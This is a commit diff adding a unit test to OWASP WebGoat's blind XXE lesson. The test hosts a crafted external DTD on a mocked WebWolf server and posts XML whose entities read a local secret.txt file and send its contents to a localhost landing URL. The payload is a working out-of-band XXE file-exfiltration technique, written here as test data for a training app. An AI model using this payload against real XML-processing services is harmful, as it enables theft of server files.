Add different solution for XXE attack

CryptoHackz · Jun 21, 2018 · 651698d · 651698d
1 parent 4d7d005
commit 651698d
Showing 1 changed file with 27 additions and 0 deletions.
diff --git a/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java b/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java
@@ -89,7 +89,34 @@ public void solve() throws Exception {
                 "%remote;" +
                 "]>" +
                 "<comment><text>test&send;</text></comment>";
+        performXXE(xml);
+    }
+
+    @Test
+    public void solveOnlyParamReferenceEntityInExternalDTD() throws Exception {
+        File targetFile = new File(webGoatHomeDirectory, "/XXE/secret.txt");
+        //Host DTD on WebWolf site
+        String dtd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
+                "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:9090/landing?text=%file;'>\">\n";
+        webwolfServer.stubFor(get(WireMock.urlMatching("/files/test.dtd"))
+                .willReturn(aResponse()
+                        .withStatus(200)
+                        .withBody(dtd)));
+        webwolfServer.stubFor(get(urlMatching("/landing.*")).willReturn(aResponse().withStatus(200)));
+
+        //Make the request from WebGoat
+        String xml = "<?xml version=\"1.0\"?>" +
+                "<!DOCTYPE comment [" +
+                "<!ENTITY % file SYSTEM \"" + targetFile.toURI().toString() + "\">\n" +
+                "<!ENTITY % remote SYSTEM \"http://localhost:9090/files/test.dtd\">" +
+                "%remote;" +
+                "%all;" +
+                "]>" +
+                "<comment><text>test&send;</text></comment>";
+        performXXE(xml);
+    }
 
+    private void performXXE(String xml) throws Exception {
         //Call with XXE injection
         mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind")
                 .content(xml))